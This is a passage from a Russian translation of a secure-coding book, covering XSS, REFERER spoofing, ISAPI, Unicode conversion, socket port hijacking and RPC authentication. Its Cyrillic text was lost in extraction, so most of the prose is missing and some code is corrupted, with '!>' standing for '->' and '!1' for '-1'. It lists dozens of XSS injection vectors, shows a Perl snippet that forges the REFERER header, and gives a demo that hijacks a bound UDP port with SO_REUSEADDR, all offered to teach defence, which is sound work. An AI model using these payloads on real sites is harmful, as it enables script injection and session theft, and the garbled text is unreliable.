return SF_STATUS_REQ_NEXT_NOTIFICATION;
}
ASP.NET:
366
II
XSS HTML. Internet Explorer
HTML , My Computer.
, , Internet Explorer 4.0,
, , , ,
Web .
. 132 msdn.microsoft.com ,
My Computer, Internet,
.
. 132. MSDN,
Internet, My Computer
:
13 Web-
367
<!!!
:
machine.config web.config
<location>, <system.web>
!!>
<configuration>
<system.web>
<pages validateRequest="true"/>
</system.web>
</configuration>
, true, ,
.
368
II
, Web,
, HTML,
, Web <IMG>
<TABLE>. HTML , .
. ,
.
:
<img src=javascript:alert([])>
<link rel=stylesheet href="javascript:alert(([])">
<input type=image src=javascript:alert(([])>
<bgsound src=javascript:alert(([])>
<iframe src="javascript:alert(([])">
<frameset onload=vbscript:msgbox(([])></frameset>
<table background="javascript:alert(([])"></table>
<object type=text/html data="javascript:alert(([]);"></object>
<body onload="javascript:alert(([])"></body>
<body background="javascript:alert(([])"></body>
<p style=left:expression(alert(([]))>
, http://online.securityfocus.com/archive/1/
272037:
<a href="javascript#[]">
<div onmouseover="[]">
<img src="javascript:[]">
<img dynsrc="javascript:[]">
<input type="image" dynsrc="javascript:[]">
<bgsound src="javascript:[]">
&<script>[]</script>
&{[]};
<img src=&{[]};>
<link rel="stylesheet" href="javascript:[]">
<iframe src="vbscript:[]">
<img src="mocha:[]">
<img src="livescript:[]">
<a href="about:<script>[]</script>">
<meta httpequiv="refresh" content="0;url=javascript:[]">
<body onload="[]">
<div style="backgroundimage: url(javascript:[]);">
<div style="behaviour: url([ ]);">
<div style="binding: url([ ]);">
<div style="width: expression([]);">
13 Web-
369
<style type="text/javascript">[]</style>
<object classid="clsid:..." codebase="javascript:[]">
<style><!</style><script>[]//></script>
<![CDATA[<!]]><script>[]//></script>
<! ><script>[]</script><! >
<<script>[]</script>
<img src="blah"onmouseover="[]">
<img src="blah>" onmouseover="[]">
<xml src="javascript:[]">
<xml id="X"><a><b><script>[]</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[] [\xC0][\xBC]/script>
.
Internet Explorer, Netscape Navigator, Mozilla Opera,
. ,
.
HTML.
, ,
, JScript,
JScript
. VBScript,
?
HTML .
, jscript:, vbscript: javascript:?
Netscape Navigator livescript: mocha:
, &{}!
, , ,
HTML,
.
, .
,
HTML Web-
HTML,
. HTML
,
. <EM>,
<PRE>, <BR>, <P>, <I></I> <B></B> ,
.
, :
if (/^(?:[\s\w\?\!\,\.\'\"]*|(?:\<\/?(?:i|b|p|br|em|pre)\>))*$/i) {
# , !
}
370
II
(\s),
AZ, az, 09 (\w),
(<)
(/), i, b, p, pr, em pre
(>). i
. ,
HTML. , Hello, </i>World!<i>
, HTML,
.
! , HTML .
,
.
,
(http://www.distributed.net), 2002 .
. ,
, , , http://n0cgi.distribu
ted.net/faq/cache/268.html. , , URL
n<>cgi.
XSS-
,
XSS.
1. Web. ,
, querystring, HTTP, cookie
.
2. .
3. , .
4. , ?
, , ,
, (
), ,
. ,
, .
.
, , innerHTML docu
ment.write.
Web
HTML Form Protocol Attack (
HTML),
. , ,
http://www.remote.org/jochen/sec/hfpa/hfpa.pdf.
13 Web-
371
Web
, Web
. ,
Microsoft,
.
- eval()
, JavaScript
eval ( ),
. eval ,
JavaScript,
. ,
HTTP
HTTP HTTP,
. ,
. Web
REFERER, cookie
, .
REFERER
REFERER HTTP, Web
URL Web, . Web
(spoofing), REFERER .
, ASP:
<%
strRef = Request.ServerVariables("HTTP_REFERER")
If strRef = "http://www.northwindtraders.com/login.html" Then
' , Login.html!
' ! .
End If
%>
Perl , REFERER HTTP
, Login.html:
372
II
];
$req!>header(Referer => 'http://www.northwindtraders.com/login.html');
$res = $ua!>request($req);
, Login.html, !
,
REFERER, .
. :
, , ,
.
, Web
: REFERER , ,
!
ISAPI
ISAPI
:
.
,
, ISAPI. ,
IIS 5 Inetinfo.exe,
SYSTEM. : DLL,
SYSTEM, ,
.
, ,
ISAPI C C++.
IIS 6 ,
SYSTEM, , ,
.
ISAPI
IPP (Internet Printing Protocol). http://www.mic
rosoft.com/technet/security/bulletin/MS01023.asp.
, ,
lpECB>GetServerVariable, HTTP
IIS. , lpdwSizeofBuffer
, , ,
, , ,
Unicode ANSI.
IPP.
13 Web-
373
374
II
// ANSI Unicode.
MultiByteToWideChar(CP_ACP,
0,
(LPCSTR)szHostName,
!1,
g_wszHostName,
sizeof (g_wszHostName) / sizeof(g_wszHostName[0]));
IIS 6 : IPP ,
, ,
.
:
ISAPI;
ISAPI;
Unicode ANSI.
ISAPI;
;
, ,
.
.
cookie-
cookie , ,
, .
, ,
, .
, cookie
, .
cookie HTML ,
. 5% 50%,
Web !
cookie
, :
HTML,
Web.
Element N.V. Element InstantShop. http://
www.securityfocus.com/bid/1836.
: cookie,
, .
,
MAC cookie ,
.
, , Web.
, ,
. , ! MAC 6.
13 Web-
375
cookie-
.
Web .
cookie.
, HTTP ,
cookie. cookie
RFC 2965 HTTP State Management Mechanism (
HTTP) (http://www.ietf.org/rfc/rfc2965.txt).
Web
, ,
.
cookie,
,
. ,
cookie. , :
SSL. SSL , cookie
. 32 ,
. , SSL
cookie, Web. , 0005F1CC.
,
cookie 0005F1CE. 0005F1CF.
: cookie ,
,
. , cookie 0005F1CD.
, Cookie: 0005F1CD
,
. ! ,
,
,
.
: cookie
. cookie
. 8. SSL,
(, ).
SSL/TLS
,
, ,
SSL. SSL, ,
, TLS, , .
:
;
;
.
376
II
,
. :
.
, SSL/TLS;
,
.
,
SSL/TLS,
.
, ,
, Subject ()
X.509, , .
WinInet, WinHTTP System.Net .NET
Framework . ,
.
XSS Web ,
.
,
. Web
.
Web, HTML HTML
XSS.
14
, ,
, . ,
,
( ) .
, Unicode .
. ,
Windows Security Push,
, ,
.
I18N.
internationalization ( i, n, 18
), .
, . , ,
10 11. , , ,
, , I18N
. .
378
II
I18N
I18N, :
Unicode;
Unicode
.
,
. , ,
, !
I18N .
Unicode
(A, , )
( ),
(code point). ,
Microsoft Windows .
, Unicode , ,
. Unicode
, .
Microsoft Windows Microsoft Office Unicode,
, , ,
Unicode. CLR .NET Framework
Unicode.
Unicode:
UTF8, UTF16 UTF32.
, UTF16,
Windows .NET.
, . UTF8
, Windows, .
Windows (National Langu
age Support, NLS) API
UTF8 UTF16, : MultiByteToWideChar
WideCharToMultiByte. UTF32 ,
.
- I18N
,
.
.
// ,
// .
14
379
// \0.
int nLen = MultiByteToWideChar(CP_OEMCP,
MB_ERR_INVALID_CHARS,
lpszOld, !1, NULL, 0);
// , !
if (nLen == 0) {
// , !
}
// .
LPWSTR lpszNew = (LPWSTR) GlobalAlloc(0, sizeof(WCHAR) * nLen);
// ,
// !
if (lpszNew == NULL) {
// , !
}
// .
nLen = MultiByteToWideChar(CP_OEMCP,
MB_ERR_INVALID_CHARS,
lpszOld, !1, lpszNew, nLen);
// ,
// .
if (nLen == 0) {
// , !
}
. , GB18030,
4 ,
.
LCMapString :
, , LCMAP_SORTKEY.
, Unicode
, Creating Arbitrary Shellcode in Unicode
Expanded Strings (http://www.nextgenss.com/papers/unicodebo.pdf)
Unicode.
, Win32
. ( CreateProcessA),
, Unicode
, Win32 W ( CreateProcessW)
16 ,
.
.
380
II
A W
Windows. winbase.h
.
#ifdef UNICODE
#define CreateProcess CreateProcessW
#else
#define CreateProcess CreateProcessA
#endif // !UNICODE
Unicode
Unicode (surrogate pair)
,
Unicode. , ,
16 U+D800 U+DBFF.
, , U+DC00 U+DFFF.
Unicode (combining character)
.
, .
http://www.unicode.org.
, :
, , 16
UTF16
. 16 Unicode
, .
Unicode .
I18N
, Unicode
. , ,
, ,
, URL.
,
.
Microsoft, Windows .NET Server 2003 IsNLSDefinedString,
, Unicode.
IsNLSDefinedString True, :
, CompareString (,
).
.
Unicode
. , 3.log Unicode (3. log),
ASCII. ,
14
381
.
, .
(
).
LCMapString
LCMapString (
), .
LCMapString
. , LCMapString
, .
, LCMapString .
, IsNLSDefinedString,
.
CreateFile
CompareString (
) : .
, , CompareString ,
NTFS , .
. ,
, ,
CreateFile .
.
. ,
ISO 88598E ( )
UTF16,
950 (Big5, )
UTF16.
, .
, ,
, .
UTF8 Windows XP
MultiByteToWideChar WideCharToMultiByte.
UTF8 UTF16 ,
.
, .
Windows
.
Microsoft MultiByteToWideChar
382
II
WideCharToMultiByte
. ,
, .
MultiByteToWideChar
MB_PRECOMPOSED MB_ERR_INVALID_CHARS
MultiByteToWideChar MB_PRECOMPOSED.
( )
. .
50000, MB_ERR_INVALID_CHARS
.
50000 MultiByteToWideChar ,
, .
MB_ERR_INVALID_CHARS
.
MSDN.
Windows XP, MB_ERR_INVALID_CHARS
UTF8 ( 65001, CP_UTF8).
WideCharToMultiByte
WC_NO_BEST_FIT_CHARS
, (,
, ), WC_NO_BEST_
FIT_CHARS. ,
.
. , (
) 8 ()!
WC_NO_BEST_FIT_CHARS Microsoft Windows 2000/XP
Microsoft Windows .NET Server 2003.
,
, WideCharToMultibyte, UTF
16, MultiByteToWideChar
.
( ), ,
.
.
/*
RoundTrip.cpp : .
*/
#include "stdafx.h"
14
/*
CheckRoundTrip
TRUE
Unicode .
FALSE.
*/
BOOL CheckRoundTrip(
DWORD uiCodePage,
LPWSTR wszString)
{
BOOL fStatus = TRUE;
BYTE *pbTemp = NULL;
WCHAR *pwcTemp = NULL;
try {
// , MAX_STRING_LEN
//
const size_t MAX_STRING_LEN = 200;
size_t cchCount = 0;
if (!SUCCEEDED(StringCchLength(wszString,
MAX_STRING_LEN, &cchCount)))
throw FALSE;
pbTemp = new BYTE[MAX_STRING_LEN];
pwcTemp = new WCHAR[MAX_STRING_LEN];
if (!pbTemp || !pwcTemp) {
printf(": !\n");
throw FALSE;
}
ZeroMemory(pbTemp,MAX_STRING_LEN * sizeof(BYTE));
ZeroMemory(pwcTemp,MAX_STRING_LEN * sizeof(WCHAR));
// Unicode .
int rc = WideCharToMultiByte( uiCodePage,
0,
wszString,
!1,
(LPSTR)pbTemp,
MAX_STRING_LEN,
NULL,
NULL );
if (!rc) {
printf(": WC2MB = %d, CodePage = %d,
String = %ws\n",
GetLastError(), uiCodePage, wszString);
throw FALSE;
}
383
384
II
// Unicode.
rc = MultiByteToWideChar(uiCodePage,
0,
(LPSTR)pbTemp,
!1,
pwcTemp,
MAX_STRING_LEN / sizeof(WCHAR) );
if (!rc) {
printf(": MB2WC = %d,
CodePage = %d, String = %ws\n",
GetLastError(), uiCodePage, wszString);
throw FALSE;
}
// Unicode!,
// .
size_t Length = 0;
StringCchLength(wszString, MAX_STRING_LEN,&Length);
if (Length+1 != rc) {
printf(" %d != rc %d\n", Length, rc);
throw FALSE;
}
// Unicode!
// .
for (size_t ctr = 0; ctr < Length; ctr++) {
if (pwcTemp[ctr] != wszString[ctr])
throw FALSE;
}
} catch (BOOL iErr) {
fStatus = iErr;
}
if (pbTemp) delete [] pbTemp;
if (pwcTemp) delete [] pwcTemp;
return (fStatus);
}
int _cdecl main(
int argc,
char* argv[])
{
LPWSTR s1 = L"\x00a9MicrosoftCorp";
LPWSTR s2 = L"To\x221e&Beyond";
printf("1252
printf("437
printf("1252
printf("437
// Copyright
// Infinity
14
385
return (1);
}
,
. ,
1252 ( Windows Latin I,
) 437 ( MS
DOS): 1252, 437,
437, 1252.
, ,
,
. , .
, [
(. http://www.unicode.org/
unicode/reports/tr21)], Invariant, (LOCALE_INVARIANT) Win
dows XP invariant culture .
386
II
Unicode
Unicode ,
( )
. , ,
U+0030 (0) U+0039 (9).
Unicode 3.1 .
.
Unicode.
.NET Framework GetUnico
deCategory. , NLS
. Unicode
http://www.unicode.org/unicode/reports/tr23.
GetStringTypeEx,
. , GetStringTypeEx,
Unicode, .
Windows ,
GetStringTypeEx.
. 141 GetStringTypeEx Unicode
, U+0080. U+0080
Unicode.
14-1.
Unicode
GetStringTypeEx
Unicode
C1_ALPHA
C1_UPPER
C1_LOWER
C1_DIGIT
C1_SPACE
C1_PUNCT
C1_CNTRL
ISO, , ,
C1_XDIGIT
C3_NONSPACING
C3_SYMBOL
C3_KATAKANA
C3_HIRAGANA
C3_HALFWIDTH
C3_IDEOGRAPH
, Unicode,
. ,
. . .
14
387
A. ,
.
, , .
, .
.
Unicode Consortium
. Form C.
.
. , ,
Form C. ( http://
www.unicode.org/unicode/reports/tr15/.)
URL IETF (Internet
Engineering Task Force) W3C. http:/
/www.idn.net/draft/draftduersti18nnorm04.txt http://www.w3.org/TR/
charmod.
NTFS, FAT32, NFS, High Sierra MacOS
.
.
RFC.
Win32 FoldString
. , Unicode,
Unicode. FoldString,
Unicode. , FoldString MAP_FOLDDIGITS
, Unicode.
I18N , ,
.
,
. ,
,
.
, , I18N .
I18N
, ,
12
Unicode. ,
, .
I18N,
Microsoft (http://www.microsoft.com/globaldev) Unicode (http://
www.unicode.org). (http://
www.unicode.org/unicode/consortium/distlist.html). , ,
news://comp.std.internat.
I I I
15
(sockets) ,
TCP/IP. IP
TCP UDP ,
. ,
IPv6 (Internet Protocol version 6)
.
, ;
,
; .
,
,
.
, .
, (Bob Quinn)
(David Shute) Windows Sockets Network Programming (AddisonWesley
Publishing Co., 1995). C
++. .cpp,
,
C.
Microsoft,
.
, Windows
, (
SSL/TLS) API SSPI (Secu
rity Support Provider Interface). API
, :
. 4, SSPI
15
391
(server hijacking)
, .
?
.
TCP UDP . ,
, , .
(unsigned short) ( 16)
C C++. 065535.
bind :
int bind (
SOCKET s,
const struct sockaddr FAR* name,
int namelen
);
.
IPv4* (Internet Protocol version 4)
sockaddr_in:
struct sockaddr_in{
short
sin_family;
unsigned short
sin_port;
struct
in_addr sin_addr;
char
sin_zero[8];
};
IPv6 .
, Microsoft
Service Pack 1 Microsoft Windows XP.
IPv6 IPv4. IPv4, ,
,
.
IP
sin_port sin_addr.
, sin_addr
. bind , ,
,
IP. . .
392
III
INADDR_ANY ( 0),
. IP,
, .
( ) : .
. INADDR_ANY
IP. IP:
157.34.32.56 172.101.92.44.
172.101.92.44,
INADDR_ANY.
IP, .
, ,
. , ,
.
SO_EXCLUSIVEADDRUSE, Microsoft Windows NT 4 SP 4.
, Microsoft ,
(Chris Wysopal) ( Weld Pond).
Netcat ( Hobbit) Windows
:
Windows NT .
, Hobbit
L0pht ( @stake). (.
Secureco2\Chapter15\BindDemo)
.
/*
BindDemoSvr.cpp
*/
#include <winsock2.h>
#include <stdio.h>
#include <assert.h>
#include "SocketHelper.h"
// , winsock2.h
#ifndef SO_EXCLUSIVEADDRUSE
#define SO_EXCLUSIVEADDRUSE ((int)(~SO_REUSEADDR))
#endif
/*
UDP!.
8391. ,
.
*/
int main(int argc, char* argv[])
{
SOCKET sock;
sockaddr_in sin;
DWORD packets;
15
393
394
III
return !1;
}
// : .
if(hijack)
{
BOOL val = TRUE;
if(setsockopt(sock,
SOL_SOCKET,
SO_REUSEADDR,
(char*)&val,
sizeof(val)) == 0)
{
printf("SO_REUSEADDR ! !!\n");
}
else
{
printf(" SO_REUSEADDR ! err = %d\n",
GetLastError());
closesocket(sock);
return !1;
}
}
else
if(nohijack)
{
BOOL val = TRUE;
if(setsockopt(sock,
SOL_SOCKET,
SO_EXCLUSIVEADDRUSE,
(char*)&val,
sizeof(val)) == 0)
{
printf("SO_EXCLUSIVEADDRUSE \n");
printf(" !\n");
}
else
{
printf(" SO_ EXCLUSIVEADDRUSE ! err = %d\n",
GetLastError());
closesocket(sock);
return !1;
}
}
if(bind(sock, (sockaddr*)&sin, sizeof(sockaddr_in)) == 0)
{
printf(" %s\n", argv[1]);
}
15
else
{
if(hijack)
{
printf("! !\ n");
}
printf(" !
= %d\n", GetLastError());
closesocket(sock);
return !1;
}
// , . ,
// ! ! ,
// .
for(packets = 0; packets < 10; packets++)
{
char buf[512];
sockaddr_in from;
int fromlen = sizeof(sockaddr_in);
// : ;
// 0, ;
// 0,
//( );
// 0, .
if(recvfrom(sock, buf, 512, 0, (sockaddr*)&from, &fromlen)> 0)
{
printf(" %s %d:\n%s\n",
inet_ntoa(from.sin_addr),
ntohs(from.sin_port),
buf);
// ,
// .
if(hijack)
{
sockaddr_in local;
if(InitSockAddr(&local, "127.0.0.1", 83 91))
{
buf[sizeof(buf)!1] = '\0';
strncpy(buf, " !", siz eof(buf) !1);
if(sendto(sock,
buf,
strlen(buf) + 1, 0,
(sockaddr*)&local,
sizeof(sockaddr_in)) < 1)
{
395
396
III
printf
(" localhost ! err = %d\n",
GetLastError());
}
}
}
}
else
{
// , , ,
// .
printf(" %d\n", GetLastError() );
break;
}
}
return 0;
}
,
. SocketHelper.cpp ,
. ,
.
.
: hijack nohijack.
, .
. hijack SO_REUSEADDR,
, nohijack
SO_EXCLUSIVEADDRUSE, SO_REUSEADDR.
, .
.
,
.
, , SO_EX
CLUSIVEADDRUSE. , ,
:
BindDemo.exe 0.0.0.0
( 192.168.0.1 IP
):
BindDemoClient.exe 192.168.0.1
:
15
397
SO_REUSEADDR ! !!
192.168.0.1
192.168.0.1 4081:
!
:
0.0.0.0
192.168.0.1 8391:
!
(,
, , IP ,
ACL), ,
.
,
. , , ,
.
. (
) :
SO_EXCLUSIVEADDRUSE ! !
0.0.0.0
:
SO_REUSEADDR ! !!
! !
= 10013
, ,
:
192.168.0.1 4097:
!
SO_EXCLUSIVEADDRUSE
,
. ,
TCP/IP
. ,
shutdown , recv
,
. closesocket,
. shutdown SDK.
398
III
TCP
RFC, TCP,
, .
,
, TCP ACK
. ,
, .
(Douglas Comer) Internet
working with TCP/IP Vol. 1: Principles, Protocols, and Architectures (4th Edition) (Pren
tice Hall, 2000) ( . /I. . 1. , . .:
, 2003).
:
( ),
.
40 TCP IP.
,
.
TCP/IP
,
. ,
, , .
. ,
. ,
, .
,
. ,
Webc,
. ,
close shutdown.
,
, ,
. IP ,
: ,
15
399
. ,
, , (multihomed)
. .
. , IP
,
/.
, IP ,
;
. ,
,
. ,
. ,
IP :
;
IP(),
;
, .
IP
Windows NT. ,
, ,
.
API Windows Sockets 2.0 (Winsock)
, .
, (, UDP), :
IP ,
. ,
.
, , ,
.
(, TCP)
. , TCP
.
, SYN.
(, ),
SYNACK,
ACK. .
, FIN.
FINACK .
, FIN
FINACK ,
(maximum segment lifetime, MSL).
400
III
MSL ,
, .
,
accept ( Accept
Connection.cpp, Secureco2\Chapter15\AcceptConnection):
15
401
{
printf(" !\n");
}
closesocket(sock2);
}
}
else
{
//
printf(" !
= %d\n", GetLastError());
break;
}
// ,
// .
if(conns > 10)
{
break;
}
}
}
,
. ? ,
, ,
. , ,
. ,
. ,
, IP
, FINACK FIN .
MLS.
,
,
. setsockport
SO_LINGER
closesocket. .
WSAAccept.
SO_CONDITIONAL_ACCEPT
,
.
402
III
IN DWORD dwCallbackData
)
{
sockaddr_in* pCaller;
sockaddr_in* pCallee;
pCaller = (sockaddr_in*)lpCallerId!>buf;
pCallee = (sockaddr_in*)lpCalleeId!>buf;
printf(" %s\n",
inet_ntoa(pCaller!>sin_addr));
// , Windows 98,
// Q193919.
if(lpSQOS != NULL)
{
// QOS.
}
// , !
// .
if(pCaller!>sin_addr.S_un.S_addr == inet_addr(MyIpAddr))
{
return CF_REJECT;
}
else
{
return CF_ACCEPT;
}
//
//
//
//
//
: CF_DEFER !
,
.
DNS! ,
, , .
}
void NewStyleListen(SOCKET sock)
{
// . .
// .
int conns = 0;
// .
BOOL val = TRUE;
if(setsockopt(sock,
SOL_SOCKET,
SO_CONDITIONAL_ACCEPT,
(const char*)&val, sizeof(val)) != 0)
15
{
printf(" SO_CONDITIONAL_ACCEPT !
= %d\n",
GetLastError());
return;
}
while(1)
{
// .
if(listen(sock, SOMAXCONN) == 0)
{
SOCKET sock2;
sockaddr_in from;
int size;
// ! accept,
// .
conns++;
size = sizeof(sockaddr_in);
// .
sock2 = WSAAccept(sock,
(sockaddr*)&from,
&size,
AcceptCondition,
conns); // conns .
if(sock2 == INVALID_SOCKET)
{
printf(" ! %d\n",
GetLastError());
}
else
{
// :
// .
printf(" %s\n",
inet_ntoa(from.sin_addr));
// ! .
closesocket(sock2);
}
}
else
{
//
printf(" !
= %d\n", GetLastError());
403
404
III
break;
}
// ,
// .
if(conns > 10)
{
break;
}
}
}
, ; ,
,
.
:
[d:\]AcceptConnection.exe
!
!
192.168.0.1
10061
192.168.0.1
10061
192.168.0.1
10061
TCP
, , .
SYN . ,
SYN, .
, ,
.
, .
:
.
.
,
.
WSAAccept ,
SYN (SYN
flood).
( AcceptEx)
/.
15
405
,
,
. :
! . ,
(
).
, .
, ,
.
, .
,
. , .
, .
, ,
.
, ,
:
;
;
, ;
;
, IP ;
.
.
.
, ,
. ,
,
TCP.
, :
. ,
, .
, IP , .
.
406
III
FTP. 21 TCP,
TCP
20 ( 1024).
, ,
20
, .
, , Microsoft SQL Server,
1433, Microsoft Terminal Server ( 3389), X Window (
XWindow
) ( 6000).
,
,
.
. ,
. , ,
,
. , ,
.
(, TCP) , ,
( , UDP).
,
, .
, DNS,
:
15
407
,
.
, (
, ),
. ,
,
.
,
(content level
filters). ,
.
,
. , .
, Web
80 .
IP-
IPv6 ,
(network address translation, NAT)
, ,
.
IP, ,
, NAT . :
IP . ,
IPv6.
,
, .
.
,
. , ,
(
); , ,
, .
408
III
: ,
. ,
, .
;
,
.
, , syslog.
UNIX UNIX
Windows. UDP,
, syslog
.
,
.
. , (Kevin
Mitnick) rsh IP
(Tsutomu Shimomura). ,
TCP
, ,
, .
DNS. , DNS
, , , somehost.nicwguys.org,
, destruc
tion.evilhackers.org.
! , ,
,
.
IP DNS
.
.
rsh: , UNIX
( root) 1024.
:
, , ,
, . ,
. ,
, ,
, .
,
.
,
. ,
15
409
, ( ) ,
. ! ,
,
.
IPv6 !
IPv6 IP,
IP IPv4. IPv6 128
, IP
,
. IPv6 ,
, . IPv6
.
, ,
IP .
IPv6 , ,
IPv4, (Christian
Huitema) IPv6: The New Internet Protocol, Second Edition (IPv6:
) (Prentice Hall PTR, 1998).
Internet Activities Board IETF, Microsoft.
IPv6 Microsoft Windows .NET Server 2003
Service Pack 1 Windows XP.
IPv6.
IPv6 IPa. IPv6
IP, , .
, IPv6 IP.
IPv6 :
(link local), (site local) (global).
, ,
IP. IP, ,
,
. :
; .
IPv6 IPSec (Internet Protocol
Security). IPv6 .
IPv6, ,
(, ),
,
IPSec. ,
IPv6
, . , ,
Microsoft
.
IPv6 . ,
( IPv4) ,
410
III
. 64
IPv6
.
, ,
. , Windows .NET
Server 2003 .
,
.
,
. :
, .
, ,
.
16
RPC,
ActiveX-
DCOM
412
III
. , API;
API LsaLookupSids,
LSA RPC.
Malformed Security Identifier Request (
) http://www.microsoft.com/technet/security/bulletin/
ms99057.asp.
135
Windows NT 3.51/NT 4 RP,
, 100 ,
.
telnet 135,
. Telnet to Port 135
Causes 100 Percent CPU Usage ( Telnet 135 100
) Microsoft Knowledge Base (http://support
.microsoft.com/support/kb/articles/Q162/5/67.asp).
, Microsoft 2001 .
Malformed RPC Request Can Cause Service Failure ( RPC
), RPC (stubs),
, DoS.
http://www.microsoft.com/technet/security/bulletin/ms01041.asp.
RPC
RPC.
RPC,
RPC.
RPC .
RPC
RPC (Remote Procedure Call)
, .
,
RPC (RPC runtime) ,
.
RPC C
C++. ,
(, Perl, Microsoft JScript Microsoft Visual Basic) RPC
COM DCOM.
Microsoft Windows RPC
OSF RPC (Open Software Foundation RPC),
, UNIX Apple.
Windows [ Print Spooler (
), Event Log ( ), Remote Registry (
16
413
RPC-
RPC .
RPC
, RPC . RPC
:
;
;
( .idl);
( .acf).
C/C++.
: RPC, , RPC.
RPC, ,
, RPC. IDL.
( ,
),
. ACF
RPC, .
RPC .
1. IDL ACF Midl.exe.
: RPC .
2. RPC. :
, .
3. RPC
( Rpcrt4.lib).
4. RPC. ,
.
5. RPC
( Rpcrt4.lib).
! , (. 161).
( ) Phone,
Phonec.c, Phones.c, IDL ACF
Phone.idl Phone.acf. Phone.idl
Midl.exe : Phone.h
RPC Phone_c.c Phone_s.c. Phonec.c Phone_c.c
Ppcrt4.lib,
Phonec.exe. , Phones.c
414
III
Phone_s.c Ppcrt4.lib
Phones.exe.
Phone.idl
Phone.acf
Phone_c.c
Phone_s.c
Midl.exe
Link.exe
Phonec.exe
161.
Link.exe
Phonec.c
Phone.h
Phones.c
Phones.exe
RPC
, !
Phne Secureco2\Chapter16\RPC.
RPC-
RPC,
, , (marsalling)
.
, RPC
. ,
.
,
.
RPC
,
TCP/IP. : , ,
RPC.
(bind) ,
.
,
, (protocol sequences), .
. . 161
.
16
16-1.
415
ncacn_np
ncalrpc
( )
ncacn_ip_tcp
TCP/IP
, ,
. ,
.
RpcStringBindingCompose. ,
ncacn_np:northwintraders[\\pipe\\phone]:
LPBYTE
LPBYTE
LPBYTE
LPBYTE
LPBYTE
LPBYTE
pszUuid
= (LPBYTE)NULL;
pszProtocolSequence
= (LPBYTE)"ncacn_np";
pszNetworkAddress
= (LPBYTE)"northwindtraders";
pszEndpoint
= (LPBYTE)"\\pipe\\phone";
pszOptions
= (LPBYTE)NULL;
pszStringBinding
= (LPBYTE)NULL;
RPC
: RPC
. ,
;
.
, .
,
cookie Web.
: RPC :
.
. .
.
416
III
RPC
. RPC :
DoS,
RPC, RPC
;
:
;
:
.
r ?
/robust MIDL-
Windows 2000 MIDL (Microsoft
Interface Definition Language) /robust.
, RPC
. ,
, RPC. ,
.
Windows 2000
, .
.
Windows 2000.
RPC Windows NT 4,
: Windows NT 4 Windows 2000 .
: /robust
MIDL.
/robust ,
.
[range]
IDL
, . , IDL
(blob) :
16
417
[range]. lo hi
0 1023, , ,
ppData, 1023 .
DoS
. ,
.
,
.
, , ,
. DoS ? :
, ,
. ,
, ,
! RPC
.
,
.
, ,
, . ,
, ,
.
.
RPC
( )
: (
) .
. ,
.
,
RpcBindingSetAuthInfo.
.
status = RpcBindingSetAuthInfo(
phone_Handle,
418
III
szSPN,
// Kerberos SPN .
RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
RPC_C_AUTHN_GSS_NEGOTIATE,
NULL,
0);
, szSPN, (service principal name,
SPN), . , AuthnLevel,
RPC_C_AUTHN_LEVEL_PKT_PRIVACY , ,
,
. . 162
RPC.
16-2.
RPC
RPC_C_AUTHN_LEVEL_
DEFAULT
.
, ,
. ,
,
!
RPC
RPC_C_AUTHN_LEVEL_CONNECT
RPC_C_AUTHN_LEVEL_NONE
.
RPC_C_AUTHN_LEVEL_
CONNECT
RPC_C_AUTHN_LEVEL_CALL
RPC. :
(
ncacn),
RPC_C_AUTHN_LEVEL_PKT
RPC_C_AUTHN_LEVEL_PKT
RPC_C_AUTHN_LEVEL_PKT_
RPC_C_AUTHN_LEVEL_PKT_
PRIVACY
RPC_C_AUTHN_LEVEL_PKT,
INTEGRITY
6
RPC_C_AUTHN_LEVEL_PKT_INTEG
RITY,
, Authn
Level ,
, .
: RpcBinding
SetAuthInfo
,
.
16
419
,
.
RpcServerRegisterAuthInfo:
status = RpcServerRegisterAuthInfo(
szSPN,
RPC_C_AUTHN_GSS_NEGOTIATE,
NULL,
NULL);
Windows , AuthnSvc,
.
RPC_C_AUTHN_GSS_WINNT, NTLM
. , Windows 2000
RPC_C_AUTHN_GSS_NEGOTIATE:
: NTLM Kerberos.
RPC_C_AUTHN_GSS_KERBEROS, RPC_C_
AUTHN_GSS_NEGOTIATE ,
, Windows NT 4. ,
:
NTLM.
, RpcBindingInqAuthClient.
(NTLM Kerberos)
( , ,
..). .
// RPC! .
void Message(handle_t hPhone, unsigned char *szMsg) {
RPC_AUTHZ_HANDLE hPrivs;
DWORD dwAuthn;
RPC_STATUS status = RpcBindingInqAuthClient(
hPhone,
&hPrivs,
NULL,
&dwAuthn,
NULL,
NULL);
if (status != RPC_S_OK) {
printf(" RpcBindingInqAuthClient : 0x%x\n", status);
RpcRaiseException(ERROR_ACCESS_DENIED);
}
// .
// .
if (dwAuthn < RPC_C_AUTHN_LEVEL_PKT) {
420
III
printf(" .\n");
RpcRaiseException(ERROR_ACCESS_DENIED);
}
if (RpcImpersonateClient(hIfPhone) != RPC_S_OK) {
printf(" .\n");
RpcRaiseException(ERROR_ACCESS_DENIED);
}
char szName[128+1];
DWORD dwNameLen = 128;
if (!GetUserName(szName, &dwNameLen))
lstrcpy(szName, " ");
printf(": %s\n"
"%s %d\n",
szMsg, szName, dwAuthn);
RpcRevertToSelf();
}
. Message
.
RpcBindingInqAuthClient AuthnLevel.
AuthnLevel
, ,
, .
. ,
.
, ,
. Windows .NET Server 2003
(
).
Windows .NET Server 2003 Impersonate a client after
authentication ( )
, ,
.
Kerberos
szSPN, RpcBindingSetAuthInfo,
, Kerberos.
: Kerberos
, NTLM .
. Kerberos, szSPN
NULL.
DsMakeSPN. Ntdsapi.h
16
421
Ntdsapi.dll. DsMa
keSPN.
. RPC
? Microsoft Platform SDK
RPC RPCSvc,
RPC.
.
Windows XP Professional, Windows .NET Server 2003
500 256 .
,
100 . . 163
, :
TCP/IP.
422
III
16-3.
RPC
AuthnLevel
(ncacn_np),
TCP/IP
(ncacn__ip_tcp),
RPC_C_AUTHN_LEVEL_NONE
1926
1051
RPC_C_AUTHN_LEVEL_CONNECT
2023
1146
RPC_C_AUTHN_LEVEL_PKT_PRIVACY
2044
1160
,
. 10%,
. :
RPC_C_AUTHN_LEVEL_CONNECT RPC_C_AUTHN_LEVEL_
PKT_PRIVACY . RPC_C_AUTHN_
LEVEL_CONNECT, RPC_C_AUTHN_LEVEL_PKT_PRIVACY.
.
RPC,
.
! 2000 .
Microsoft
,
RPC.
, (
RpcBindingSetAuthInfo)
. ( )
,
. ,
: ,
, . ,
,
RPC DCOM.
. 162 RPC_C_AUTHN_LEVEL_NO
NE, . 163 RPC_C_AUTHN_LEVEL_PKT_PRIVACY.
